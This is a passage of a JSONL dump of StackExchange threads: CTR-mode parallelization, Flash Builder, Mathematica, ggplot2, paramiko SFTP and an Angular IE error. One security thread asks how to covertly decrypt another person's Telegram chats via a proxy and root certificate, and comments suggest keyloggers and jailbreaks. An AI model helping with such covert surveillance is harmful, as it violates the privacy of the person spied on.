available, the obvious way to parallelize CTR mode encryption is to distribute each chunk of $n$ consecutive blocks among the processors, so that processor $0 \\le i < n$ computes:\n$$ C_j = E_K(c_j) \\oplus P_j, \\quad j = i + kn, k = 0,1,2,\\dotsc$$\nwhere $c_j$ is the $j$-th counter value, $P_j$ and $C_j$ are the $j$-th plaintext and ciphertext blocks, $E_K(\\cdot)$ denotes block cipher encryption with the key $K$, and $\\oplus$ denotes XOR. Of course, as CTR decryption is identical to encryption, the same scheme can be used for both. When encrypting data in RAM, it is also generally most efficient to do the encryption in place, with the output overwriting the input.\nThis basic parallelization scheme makes most sense if the processors are accessing the memory via a shared cache, or if they're dedicated hardware units that access shared memory only via a controller unit. 
(In the latter case, it may also make sense for the processors to only handle the keystream generation, and leave the relatively trivial XOR operation to the controller.)\nIf the processors each have a local cache, it may be more efficient to split the ciphertext into longer chunks, of a suitable size to fit into this cache, and have each processor encrypt one chunk at a time. This can be particularly effective if the bus width \/ optimal transfer burst size between the cache and the main memory storing the plaintext \/ ciphertext is longer than one cipher block. Again, if the memory controller is smart enough to perform the XOR operation directly, without having to first transfer the plaintext to the processors and the ciphertext back, this is an optimization worth taking.\nOn general-purpose processors that support efficient SIMD operations, having each processor encrypt several blocks at can also enable the use of bit-slicing techniques in the block cipher encryption process. However, this does not necessarily require the blocks assigned to a single processor to be consecutive, merely that they're processed more than one at a time.\nAlso, CTR mode allows the keystream $E_K(c_j)$ to be computed in advance, even before the plaintext \/ ciphertext input is known. In some circumstances, such as when dealing with very bursty data transfers, buffering the keystream in advance may be useful.\nAnyway, the nice thing about CTR mode is that the result of the encryption process is exactly the same regardless of what order it's done in, or how many processors it's distributed over. In particular, this means that the two ends of an encrypted channel can each select the parallelization scheme that is most suited to them, even if their computational capabilities are wildly different.\n","meta":{"source":"crypto.stackexchange","title":"How can one parallelize tasks in CTR-AES for maximum performance?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Starting new actionscript project in Flash Builder 4.7: no SDK selection available\n\nQuestion: I'm using Flash Builder 4.7. When starting a new Actionscript Project, the first popup box where you define the project name etc doesn't show any SDK's. So under \"This project will use\" there is just an empty area...\nAnd in the created project I also can't link to a Flex SDK in the Actionscript Build Path.\nWhen starting a new Flex Project, everything is OK and I can choose between the different SDK's installed.\nAny idea what could be wrong?\nThanks in advance for any help!\nFrank\nComment: I don't see the issue. You don't need an SDK for a pure ActionScript project. (Except the compiler that is, but FB will use the compiler of the default SDK)\nComment: I had same problem awhile back with 4.7 - it started after i overlaid a different AIR SDK over Flex SDK (cant remember which versions). Seems that FB got a bit confused - something to do with the new compiler not liking the flex\/air merge i had done. I had to reinstall FB\nComment: yep, tried that, even reinstalled the complete damned Flash Builder...\nAnswer: Problem found and solved thanks to this blog post:\nhttp:\/\/www.badu.ro\/?p=238\nApparantly when moving from Flex Builder 4.6 to 4.7 you have to use new workspaces. 
If you reuse the existing ones from version 4.6 you run into problems like I was having...\nThanks for all your help,\nFrank\nAnswer: I suspect you are seeing errors because your class has no package definition.\n<code>package com.something.something\n{\n\/\/ imports\nimport flash.display.Sprite\n\/\/ class definition\n\n public class Something extends Sprite{\n\n }\n}\n<\/code>\nBut, you didn't show us the actual errors in your screenshot. IF that is not the error, please provide the text of your compiler errors \/ warnings. In Flash Builder, from the WIndow Menu select Show View and Problems. \nComment: I'm not sure why you'd get that on an ActionScript only project in Flash Builder 4.7. 4.7 should use the new 'Falcon' ActionScript compiler and not mxmlc from the Flex SDK.\nComment: I've heard that FB 4.7 is a total disaster. I switched to IntelliJ IDEA about 6 months ago (FB was at 4.6 at the time). Even though IDEA is not without its flaws, I wouldn't want to go back to FB even if they paid me for it.\nComment: I've heard similar things; although I've also heard it runs great on Windows. In my limited usage; I haven't run into any problems w\/ FB4.7, though.\nComment: This is the error message: Unknown Flex SDK: \"Flex 4.6.0\". Unknown Flex Problem\n","meta":{"source":"stackoverflow","title":"Starting new actionscript project in Flash Builder 4.7: no SDK selection available","dup_signals":{}},"subset":"stackexchange"} +{"text":"Piecewise function not plotting\n\nQuestion: I have piecewise function A which is defined as shown below. When I plot piecewise in Mathematica I could not able to see any points after x=3.5, but If I evaluate the A I am getting value. I am bit confused and curious why it is happening? Am I using the piecewise function properly?\n<code>z1 = 1;\nz2 = 2;\nz3 = 3;\nL = 4;\na1 = -0.0664623 Cos[1.52648 x] + 0.0664621 Cosh[1.52648 x] + \n 0.0736429 Sin[1.52648 x] - 0.0736415 Sinh[1.52648 x] \na2 = 0.0706263 Cos[1.52648 (-1 + x)] - \n 0.0012975 Cosh[1.52648 (-1 + x)] + \n 0.0696575 Sin[1.52648 (-1 + x)] - 0.0317435 Sinh[1.52648 (-1 + x)] \na3 = 0.0727183 Cos[1.52648 (-2 + x)] - \n 0.0727174 Cosh[1.52648 (-2 + x)] - 0.413845 Sin[1.52648 (-2 + x)] + \n 0.267041 Sinh[1.52648 (-2 + x)] \na4 = -0.410217 Cos[1.52648 (-3 + x)] + \n 0.410216 Cosh[1.52648 (-3 + x)] + 0.585447 Sin[1.52648 (-3 + x)] - \n 0.192384 Sinh[1.52648 (-3 + x)] \nA = Piecewise[{{a1, x <= z1}, {a2, z1 <= x <= z2}, {a3, \n z2 <= x <= z3}, {a4, x >= z3}}]\nPlot[A, {x, 0, L}]\n<\/code>\nComment: `Plot` has a lot of hidden calculating going on. Part of this tries to decide what range to plot. If you change your code to `Plot[A, {x, 0, L},PlotRange->All]` it will show you everything out to 4. You can look up `PlotRange` to see how to give it even more precise instructions.\nComment: @acoustics in the last position put `{a4, True}` instead `{a4, x >= z3}` and take `L=5` to check difference.\nAnswer: I have done some modifications on your code such that you can obtain your desired plot. 
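\n(For completeness: as one of the comments above already points out, simply adding the option below to the original <code>Plot<\/code> call also reveals the part of the curve beyond x=3.5.)\n<code>Plot[A, {x, 0, L}, PlotRange -> All]\n<\/code>\nThe version that follows instead sets an explicit plot range. 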
If you want to have a different region in the plot you can change minX,maxX, minY and maxY values.\n<code>ClearAll[\"Global`*\"];\n\nz1 = 1;\nz2 = 2;\nz3 = 3;\nL = 4;\n\na1[x_] := -0.0664623 Cos[1.52648 x] + 0.0664621 Cosh[1.52648 x] + 0.0736429 Sin[1.52648 x] - 0.0736415 Sinh[1.52648 x];\na2[x_] := 0.0706263 Cos[1.52648 (-1 + x)] - 0.0012975 Cosh[1.52648 (-1 + x)] + 0.0696575 Sin[1.52648 (-1 + x)] - 0.0317435 Sinh[1.52648 (-1 + x)];\na3[x_] := 0.0727183 Cos[1.52648 (-2 + x)] - 0.0727174 Cosh[1.52648 (-2 + x)] - 0.413845 Sin[1.52648 (-2 + x)] + 0.267041 Sinh[1.52648 (-2 + x)];\na4[x_] := -0.410217 Cos[1.52648 (-3 + x)] + 0.410216 Cosh[1.52648 (-3 + x)] + 0.585447 Sin[1.52648 (-3 + x)] - 0.192384 Sinh[1.52648 (-3 + x)];\n\nA[x_] := Piecewise[{\n{a1[x], x <= z1},\n{a2[x], z1 <= x <= z2},\n{a3[x], z2 <= x <= z3},\n{a4[x], x >= z3}\n}];\n\nminX = 0;\nmaxX = L;\n\nminY = -0.5;\nmaxY = A[L];\n\nPlot[A[x], {x, 0, L}, PlotRange -> {{minX, maxX}, {minY, maxY}}]\n<\/code>\nWhen you run the code, you obtain\n","meta":{"source":"mathematica.stackexchange","title":"Piecewise function not plotting","dup_signals":{}},"subset":"stackexchange"} +{"text":"ggplot - geom_segment() with mutiple arrows\n\nQuestion: I am working on Principal Component Analysis (PCA).\nI found <code>ggfortify<\/code> works great but would like to do some manual adjustments.\nHere then trying to plot the PCA results as below:\n<code>evec <- read.table(textConnection(\"\n PC1 PC2 PC3\n -0.5708394 -0.6158420 -0.5430295\n -0.6210178 -0.1087985 0.7762086\n -0.5371026 0.7803214 -0.3203424\"\n), header = TRUE, row.names = c(\"M1\", \"M2\", \"M3\"))\n\nres.ct <- read.table(textConnection(\"\n PC1 PC2 PC3\n -1.762697 -1.3404825 -0.3098503\n -2.349978 -0.0531175 0.6890453\n -1.074205 1.5606429 -0.6406848\n 2.887080 -0.7272039 -0.3687029\n 2.299799 0.5601610 0.6301927\"\n), header = TRUE, row.names = c(\"A\", \"B\", \"C\", \"D\", \"E\"))\n\nrequire(ggplot2)\nrequire(dplyr)\ngpobj <- \n res.ct %>%\n ggplot(mapping = aes(x=PC1, y=PC2)) +\n geom_point(color=\"grey30\") +\n annotate(geom=\"text\", x=res.ct$PC1*1.07, y=res.ct$PC2*1.07,\n label=rownames(res.ct))\n\nfor (i in 1:nrow(evec))\n{\n PCx <- evec[i,1]\n PCy <- evec[i,2]\n axisname <- rownames(evec)[[i]]\n gpobj <- gpobj +\n geom_segment(\n data = evec[i,],\n aes(\n x = 0, y = 0,\n xend = PC1, yend = PC2\n # xend = PCx, yend = PCy #not work as intended\n ),\n arrow = arrow(length = unit(4, \"mm\")),\n color = \"red\"\n ) +\n annotate(\n geom = \"text\",\n x = PCx * 1.15, y = PCy * 1.15,\n label = axisname,\n color = \"red\"\n )\n}\ngpobj\n<\/code>\nThe code works well but when I tried to use the commented line <code>xend = PCx, yend = PCy<\/code> instead of <code>xend = PC1, yend = PC2<\/code>, it does not work well as I intended, it does not show the all arrows.\n<code>xend = PC1, yend = PC2<\/code> works well:\n\n<code>xend = PCx, yend = PCy<\/code> does not:\n\nQuestion: \nWhy does not <code>geom_segment()<\/code> maintain the previous arrow when the starting and ending points are specified by environment variables rather than referred by variable names from <code>data =<\/code>?\nComment: Which ggplot2 version are you using? 
Seems to yield the same result for 3.0.0.\nAnswer: In the code you used, when <code>PCx<\/code> \/ <code>PCy<\/code> are specified inside the aesthetic mapping <code>aes(...)<\/code> (as opposed to hard coding them to fixed aesthetic values outside <code>aes(...)<\/code>, as done for the <code>annotate<\/code> layers), the actual values are only evaluated when you plot \/ print the ggplot object <code>gpobj<\/code>.\nThis means the values of <code>PCx<\/code> \/ <code>PCy<\/code> are evaluated outside the for-loop. By this point, they correspond to the last values they took on, for <code>i = 3<\/code>, and that is why only one arrow segment (actually three arrows overlaid atop one another) is visible. Moving <code>xend = PCx, yend = PCy<\/code> outside <code>aes(...)<\/code> should achieve the look you want.\nI do wonder why you choose to use for-loops in the first place, though. Wouldn't something like the following serve the same purpose?\n<code># convert row names to explicit columns\nres.ct <- tibble::rownames_to_column(res.ct)\nevec <- tibble::rownames_to_column(evec)\n\n# plot\nres.ct %>%\n ggplot(mapping = aes(x=PC1, y=PC2)) +\n geom_point(color=\"grey30\") +\n geom_text(aes(x = PC1 * 1.07, y = PC2 * 1.07,\n label = rowname)) +\n geom_segment(data = evec,\n aes(x = 0, y = 0, xend = PC1, yend = PC2, group = rowname),\n arrow = arrow(length = unit(4, \"mm\")),\n color = \"red\") +\n geom_text(data = evec,\n aes(x = PC1 * 1.15, y = PC2 * 1.15, label = rowname),\n colour = \"red\")\n<\/code>\nComment: Thanks for your excellent answer. I didn't realized when the aesthetics variables are evaluated. Your example gave me a better understanding for ggplot2. (using ggplot2 version 3.1.1)\n","meta":{"source":"stackoverflow","title":"ggplot - geom_segment() with mutiple arrows","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to decrypt Telegram messages from a private chat?\n\nQuestion: Assuming you have access to another person's device, set up a SOCKS5 proxy, install a root certificate to parse the SSL traffic, and take a screenshot of the private key of a private chat.\nIs it now possible to use the proxy to record a message and manually decrypt it with the private key?\nEDIT:\nYou can display the encryption key inside a private chat. Here is a screenshot.\nIs this the private key used to encrypt and decrypt the messages? On Telegram FAQ, you can read \"this is not the key itself, of course!\"\nIf not, is it possible to derive the encryption key from it? Or is the private key only stored deep in the app?\nComment: Don't forget to install key logger, too.\nComment: Unfortunately, it's not possible to install a key logger on iOS\nComment: What about https:\/\/celltrackingapps.com\/detect-a-keylogger-on-my-iphone\/\nComment: New!, [Apple's Borked iOS Update Leads to New Jailbreak and Vulnerable iPhones](https:\/\/gizmodo.com\/apples-borked-ios-update-leads-to-new-jailbreak-and-vul-1837374615)\nAnswer: The data is encrypted using a random AES key. The AES key is then encrypted using the receiver's public key. 
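\nAs a rough illustration of that pattern only (this is a generic hybrid-encryption sketch, not Telegram's actual MTProto code; it assumes the Python <code>cryptography<\/code> package and an RSA public-key object from that package, with RSA-OAEP and AES-GCM chosen just for the example):\n<code>import os\nfrom cryptography.hazmat.primitives.ciphers.aead import AESGCM\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\n\ndef hybrid_encrypt(receiver_rsa_public_key, plaintext):\n    # fresh random AES key for this message\n    session_key = AESGCM.generate_key(bit_length=256)\n    nonce = os.urandom(12)\n    # bulk data encrypted under the symmetric key\n    ciphertext = AESGCM(session_key).encrypt(nonce, plaintext, None)\n    # the AES key itself encrypted with the receiver's public RSA key\n    wrapped_key = receiver_rsa_public_key.encrypt(\n        session_key,\n        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),\n                     algorithm=hashes.SHA256(), label=None))\n    return wrapped_key, nonce, ciphertext\n<\/code>\n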
\nThe encrypted data along with the encrypted key is transmitted to the user, who uses their private key to decrypt the AES key, which in return is used to decrypt the encrypted text.\n\nIs it now possible to use the proxy to record a message and manually decrypt it with the private key?\n\nSince the private key is never transmitted during the communication process it is not possible to sniff them using a socks proxy with a root certificate in place on the device.\nI think it's a good idea to get a better understanding of how asymmetric encryption works. The following link breaks it down quite nicely using a simple way of explaining it: https:\/\/hackernoon.com\/asymmetric-encryption-explained-using-chocolate-boxes-5a329ea6813e\nComment: Thanks for your answer and further information! I have specified my question.\nAnswer: You are purporting an scenario where:\n\nAn attacker has full access to another person's device\nHe then wants do decrypt a later-received message\n\nHowever, assuming that the attacker got complete control (ie. root) of the device\n\nHe could extract the key of the private chat, that is stored in the app storage.\nOr, even more easy, replace the Telegram app with an evil Telegram which works as the legit one but additionally sends the attacker a decrypted copy of all messages.\nComment: Thanks for your answer! I'm interested in possibilities on a not-rooted iPhone. To my knowledge, it is not possible to extract the key or replace the app with a separate variant.\nAnswer: Some thoughts:\n\nThe screenshot shows the fingerprint of the key exchange between both users, not the key itself. It is therefore not usable for any attack.\nTelegram clients connect to hardcoded IP address lists and ports, and immediately want to speak MTproto, the internal Telegram protocol, so a SOCKS proxy won\u00b4t help you much, except you switch on proxy in the device (which is perfectly possible when you got access to the device)\nUpon connecting to the server the Telegram app will check the server messages against a cert signature - as long as you do not have the private server key of the MTproto conversation you won\u00b4t be able to fool the app or sniff the conversation in clear - and that\u00b4s even before the secret chat protocol begins.\nIf iOS warrants App safety so that just a plain access to the device without breaking it apart will not allow access to the App data storage in plain, you cannot exfiltrate the private user key.\n\nI doubt it will ever possible to break this open, especially without the user\u00b4s attention. Means you need to \"borrow\" the device for an unlimited amount of time until your attack is successful. 
Nothing to gain from 5 minutes sniffing on the device.\n","meta":{"source":"security.stackexchange","title":"Is it possible to decrypt Telegram messages from a private chat?","dup_signals":{}},"subset":"stackexchange"} +{"text":"ssh paramiko can't read xlsx files\n\nQuestion: I use paramiko to ssh\n<code>ssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy( paramiko.AutoAddPolicy() ) \nssh.connect(Hostname, username=Username, password=Password) \nftp = ssh.open_sftp()\nfiles = ftp.listdir()\ndir_oi = \"directory_of_interest\"\nfoi = ftp.listdir(dir_oi)\n<\/code>\nand can find a read a <code>csv<\/code> successfully with:\n<code>remote_file = ( dir_oi +\"\/\" + foi[-1])\nwith ftp.open(remote_file) as f:\n df = pd.read_csv(f, sep = '\\t', header = None)\n<\/code>\nthe minute I change <code>remote_file<\/code> to an <code>xlsx<\/code>, with\n<code>with ftp.open(uw_remote_file) as f:\n df = pd.read_excel(f)\n<\/code>\nI get the error <code>SSHException: Server connection dropped:<\/code> or <code>Socket Closed<\/code>\nof note, I can run this line without any error <code>existing_xlsx = ftp.open(uw_remote_file)<\/code>\nAny suggestions how to overcome this?\nlogfile as requested:\n<code>DEB [20220519-09:22:45.998] thr=1 paramiko.transport.sftp: [chan 0] listdir(b'blah')\nDEB [20220519-09:22:48.009] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah\/halb.csv', 'r')\nDEB [20220519-09:22:48.241] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah\/halb.csv', 'r') -> 35323935333939313533313032363062\nDEB [20220519-09:22:49.084] thr=1 paramiko.transport.sftp: [chan 0] close(35323935333939313533313032363062)\nDEB [20220519-09:23:24.790] thr=1 paramiko.transport.sftp: [chan 0] listdir(b'blah2')\nDEB [20220519-09:24:01.590] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r')\nDEB [20220519-09:24:01.975] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r') -> 37343338363564356234303033663337\nDEB [20220519-09:24:23.510] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r')\nDEB [20220519-09:24:23.727] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r') -> 64646361316532373233663463613036\nDEB [20220519-09:24:24.108] thr=2 paramiko.transport: EOF in transport thread\nDEB [20220519-09:24:24.108] thr=1 paramiko.transport.sftp: [chan 0] close(64646361316532373233663463613036)\n<\/code>\ntraceback:\n<code>Traceback (most recent call last):\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 852, in _read_response\n t, data = self._read_packet()\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp.py\", line 201, in _read_packet\n x = self._read_all(4)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp.py\", line 188, in _read_all\n raise EOFError()\nEOFError\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"C:\\Users\\alexander.huhn.adm\\AppData\\Local\\Temp\\24\\ipykernel_33560\\4051829457.py\", line 4, in <cell line: 2>\n df = pd.read_excel(f)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\util\\_decorators.py\", line 311, in wrapper\n return func(*args, **kwargs)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 457, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n File 
\"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 1376, in __init__\n ext = inspect_excel_format(\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 1255, in inspect_excel_format\n buf = stream.read(PEEK_SIZE)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\file.py\", line 219, in read\n new_data = self._read(read_size)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_file.py\", line 185, in _read\n t, msg = self.sftp._request(\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 822, in _request\n return self._read_response(num)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 854, in _read_response\n raise SSHException(\"Server connection dropped: {}\".format(e))\nparamiko.ssh_exception.SSHException: Server connection dropped:\n<\/code>\nI can download using\n<code>filepath = uw_remote_file\nlocalpath = \"test.xlsx\"\nftp.get(filepath,localpath)\n<\/code>\nso will go down that route and delete after use\nComment: Complete Python stack trace please + Paramiko log file + Can you download that file? I.e., can you do e.g. `fl = io.BytesIO()` + `sftp.getfo(file_name, fl)`?\nComment: You didn't provide the information I've asked for. Not did you really answer my question about the download.\nAnswer: From the log it looks like it were able to open both files. <code>pandas<\/code> is running into EOF error, So, which means excel file is completely empty.\nCan you confirm if that is empty.\nComment: when downloaded, was able to open and see the relevant data\n","meta":{"source":"stackoverflow","title":"ssh paramiko can't read xlsx files","dup_signals":{}},"subset":"stackexchange"} +{"text":"Different order of computations for nested Do\n\nQuestion: When I use\n<code>Do[Print[{a, b}],{a, 0, 2},{b, 0, 2}]\n<\/code>\nthen I (correctly) obtain\n<code>{0, 0} {0, 1} {0, 2} {1, 0} {1, 1} {1, 2} {2, 0} {2, 1} {2, 2}\n<\/code>\nHowever, I would like something like:\n<code>{0, 0} {0, 1} {1, 0} {0, 2} {1, 1} {2, 0} {1, 2} {2, 1} {2, 2}\n<\/code>\nThat is, I want to prioritize calculations for which $a+b$ is small.\nIs there any simple way to achieve this within the <code>Do<\/code> Command?\nComment: Maybe `Do[Print[{a, t - a}], {t, 0, 4}, {a, Max[0, t - 2], Min[t, 2]}]`?\nComment: @CarlWoll Interesting approach, that is really helpful. 
Note that it generalizes to more variables by `Do[Print[{a, s - a, t - s}], {t, 0, 6}, {s, Max[0, t - 2], \n Min[t, 4]}, {a, Max[0, s - 2], Min[s, 2]}]`, `Do[Print[{a, s - a, t - s, u - t}], {u, 0, 8}, {t, Max[0, u - 2], \n Min[u, 6]}, {s, Max[0, t - 2], Min[t, 4]}, {a, Max[0, s - 2], \n Min[s, 2]}]` etcetera\nAnswer: In my opinion, this doesn't seem like a very natural action to take with <code>Do<\/code>, which requires a fixed iterator specification.\nRather, you can construct a list with <code>Table<\/code> (note that the syntax is very similar to <code>Do<\/code>) :\n<code>Table[{a, b}, {a, 0, 2}, {b, 0, 2}]\n<\/code>\n\n{{{0, 0}, {0, 1}, {0, 2}}, {{1, 0}, {1, 1}, {1, 2}}, {{2, 0}, {2, 1}, {2, 2}}}\n\nYou can convert this to a list of tuples with <code>Flatten<\/code>:\n<code>Flatten[%, 1]\n<\/code>\n\n<code>{{0, 0}, {0, 1}, {0, 2}, {1, 0}, {1, 1}, {1, 2}, {2, 0}, {2, 1}, {2, 2}}\n<\/code>\n\nThen sort it according to the sum of the list elements:\n<code>sortedList = SortBy[%, Total]\n<\/code>\n\n<code>{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {1, 1}, {2, 0}, {1, 2}, {2, 1}, {2, 2}}\n<\/code>\n\nFinally, you can iterate over the elements in this list using <code>Scan<\/code> :\n<code>Scan[Print, %]\n<\/code>\n\nEdit : It's worth mentioning that it's possible to use <code>Do<\/code> rather than <code>Scan<\/code> in the last line, but <code>Scan<\/code> is really a better fit here.\nIf you insist upon using <code>Do<\/code>, you can do\n<code>Do[Print[x], {x, sortedList}]\n<\/code>\nComment: Thanks for your reply. I will consider this, however I do not really like the idea of a possibly large sortedList sitting inside my ram.\nAnswer: You can generate zig-zag ordered indices dynamically, without generating all possible values first.\nHere is a simple zig-zag algorithm adopted from this SO answer.\nIt should be optimized if the speed is a concern.\nFunction <code>zigZagOrdering<\/code> converts an integer <code>index<\/code> (from <code>0<\/code> to <code>lengthA*lengthB-1<\/code>)\ninto the values of <code>a<\/code> (from <code>0<\/code> to <code>lengthA-1<\/code>) and <code>b<\/code> (from <code>0<\/code> to <code>lengthB-1<\/code>).\n<code>ClearAll[zigZagOrdering];\nzigZagOrdering = Compile[{{lengthA, _Integer}, {lengthB, _Integer}, {index, _Integer}},\nModule[{dx = 1, dy = -1, a=0, b=0},\n Do[\n a = a + dy;\n b = b + dx;\n If[a<0||b<0||a>=lengthA||b>=lengthB, {dx,dy} = {dy,dx}];\n If[a>=lengthA, a=lengthA-1; b=b+2];\n If[b>=lengthB, b=lengthB-1; a=a+2];\n If[a<0, a=0];\n If[b<0, b=0],\n {i, 0, index-1}];\n {a,b}\n ]]\n<\/code>\nThis function can be used as follows:\n<code>Module[{lengthA=3, lengthB=3, a, b},\n Do[\n {a,b} = zigZagOrdering[lengthA, lengthB, index];\n Print[{a,b}],\n {index, 0, lengthA*lengthB-1}\n ];\n ]\n<\/code>\n\n<code>{0,0}, {0,1}, {1,0}, {2,0}, {1,1}, {0,2}, {1,2}, {2,1}, {2,2}\n<\/code>\nAnswer: If you do not mind ultimately over a slightly bigger domain. (For example if you plan on aborting at some stage anyway) you can simply redefine you indices <code>A=a+b<\/code> and <code>b<\/code> \n<code>Do[Print[{A-b,b}],{A,0,4},{b,0,2}]\n<\/code>\nif you want to restrict to the same square domain\n<code>Do[Print[{(A-b),b}],{A,0,4},{B, Max[0,A-2] , Min[2,A]}]\n<\/code>\nComment: I very much like this method's simplicity, but I think it needs some refinement. The first code can be vastly improved by replacing `{B,-A,A}` with `{B,-A,A,2}` -- this eliminates all the fractions. 
(As a bonus, you can restrict to exactly the desired output by checking that `a<=2&&b<=2` in the body of `Do`.) Moreover, your second method doesn't work. It misses `{2,0}`, for example.\nComment: corrected the bounds. Works perfectly now\nComment: You still need to replace `B` with `b` in the iterator specification for your second method.\nComment: It's worth mentioning that the second method is now extremely similar to [CarlWoll](https:\/\/mathematica.stackexchange.com\/users\/45431\/carl-woll)'s [comment](https:\/\/mathematica.stackexchange.com\/questions\/146902\/different-order-of-computations-for-nested-do\/146934#comment394799_146902).\nAnswer: <code>all[{i_Integer}] := Sequence @@ {{0, i}, {i, 0}}\nall[{i_Integer, i_Integer}] := {i, i}\nall[{i_Integer, j_Integer}] := Sequence @@ {{i, j}, {j, i}}\nDo[Print \/@ all \/@ IntegerPartitions[i, 2, Range[3]], {i, 1, 7}]\n<\/code>\nAnswer: <code>SortBy[Tuples[Range[0, 2], 2], Total]\n\n{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {1, 1}, {2, 0}, {1, 2}, {2, 1}, {2,2}}\n<\/code>\nAnswer: Take your list and then:\n<code>SortBy[mylist, Norm]\n<\/code>\nComment: Reasonable approach that gives `{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {2, 0}, {1, 1}, {2, 2}, {1, 2}, {2, 1}}`. Similar but not identical to what was suggested in the question.\n","meta":{"source":"mathematica.stackexchange","title":"Different order of computations for nested Do","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"Object doesn't support this action\" error when navigate to new component in IE\n\nQuestion: I got the error message when I stayed at a component and navigate to another one. The error will not show if I stay at that component and refresh. It happen in some components. I tried to create new component with nothing in the content, it's still happen if I navigate to this component. The error message is showed in a none-stop way. \nI'm using Angular 2 final. It's just happen in IE (Using IE11). 
Here is my package.json:\n<code>\"dependencies\": {\n \"@angular\/common\": \"~2.2.0\",\n \"@angular\/compiler\": \"~2.2.0\",\n \"@angular\/core\": \"~2.2.0\",\n \"@angular\/forms\": \"~2.2.0\",\n \"@angular\/http\": \"~2.2.0\",\n \"@angular\/platform-browser\": \"~2.2.0\",\n \"@angular\/platform-browser-dynamic\": \"~2.2.0\",\n \"@angular\/router\": \"~3.2.0\",\n \"@angular\/upgrade\": \"^2.2.0\",\n \"@ng-idle\/core\": \"^2.0.0-beta.4\",\n \"@ng-idle\/keepalive\": \"^2.0.0-beta.4\",\n \"angular2\": \"^2.0.0-beta.17\",\n \"angular2-in-memory-web-api\": \"0.0.21\",\n \"angular2-jwt\": \"0.1.25\",\n \"bootstrap-sass\": \"^3.3.7\",\n \"core-js\": \"2.4.1\",\n \"font-awesome\": \"^4.7.0\",\n \"ng2-pagination\": \"^1.0.1\",\n \"ng2-translate\": \"4.0.0\",\n \"reflect-metadata\": \"^0.1.8\",\n \"rxjs\": \"5.0.0-beta.12\",\n \"strip-bom\": \"^3.0.0\",\n \"typescript\": \"^2.1.4\",\n \"zone.js\": \"0.6.25\"\n },\n \"devDependencies\": {\n \"angular2-template-loader\": \"^0.6.0\",\n \"codelyzer\": \"1.0.0-beta.3\",\n \"copy-webpack-plugin\": \"^4.0.1\",\n \"extract-text-webpack-plugin\": \"^1.0.1\",\n \"file-loader\": \"^0.9.0\",\n \"gulp\": \"^3.9.1\",\n \"gulp-insert-lines\": \"0.0.4\",\n \"gulp-replace\": \"^0.5.4\",\n \"gulp-sass\": \"^2.3.2\",\n \"html-loader\": \"^0.4.4\",\n \"html-webpack-plugin\": \"^2.24.1\",\n \"istanbul-instrumenter-loader\": \"^1.0.0\",\n \"jasmine\": \"^2.5.2\",\n \"karma\": \"^1.3.0\",\n \"karma-coverage\": \"^1.1.1\",\n \"karma-jasmine\": \"^1.0.2\",\n \"karma-mocha-reporter\": \"^2.2.0\",\n \"karma-phantomjs-launcher\": \"^1.0.2\",\n \"karma-remap-istanbul\": \"^0.2.1\",\n \"karma-sourcemap-loader\": \"^0.3.7\",\n \"karma-webpack\": \"^1.8.0\",\n \"phantomjs-prebuilt\": \"^2.1.13\",\n \"raw-loader\": \"^0.5.1\",\n \"remap-istanbul\": \"^0.7.0\",\n \"ts-helpers\": \"^1.1.2\",\n \"ts-loader\": \"^1.2.1\",\n \"tslint\": \"^3.15.1\",\n \"tslint-loader\": \"^2.1.5\",\n \"typescript\": \"^2.1.4\",\n \"typings\": \"^2.0.0\",\n \"webpack\": \"^1.13.3\",\n \"webpack-dev-server\": \"^1.16.2\"\n }\n<\/code>\nAnd here is my polyfill.ts:\n<code>import 'core-js';\nimport 'reflect-metadata';\nimport 'zone.js\/dist\/zone';\n\nimport 'ts-helpers';\n\nif (process.env.ENV === 'prod') { \/\/ Production\n \/\/ @Todo: will be defined\n} else {\n \/\/ Development\n Error['stackTraceLimit'] = Infinity;\n require('zone.js\/dist\/long-stack-trace-zone');\n}\n<\/code>\nSee the error:\n\nIt did not happen before. So I can't find out the root cause and the solutions. Any ideas? Thanks\nAnswer: Finally I found the root cause. A function is called in none-stop way from the other library even in the pages have no objects which it need. No objects is provided, it caused the problem. 
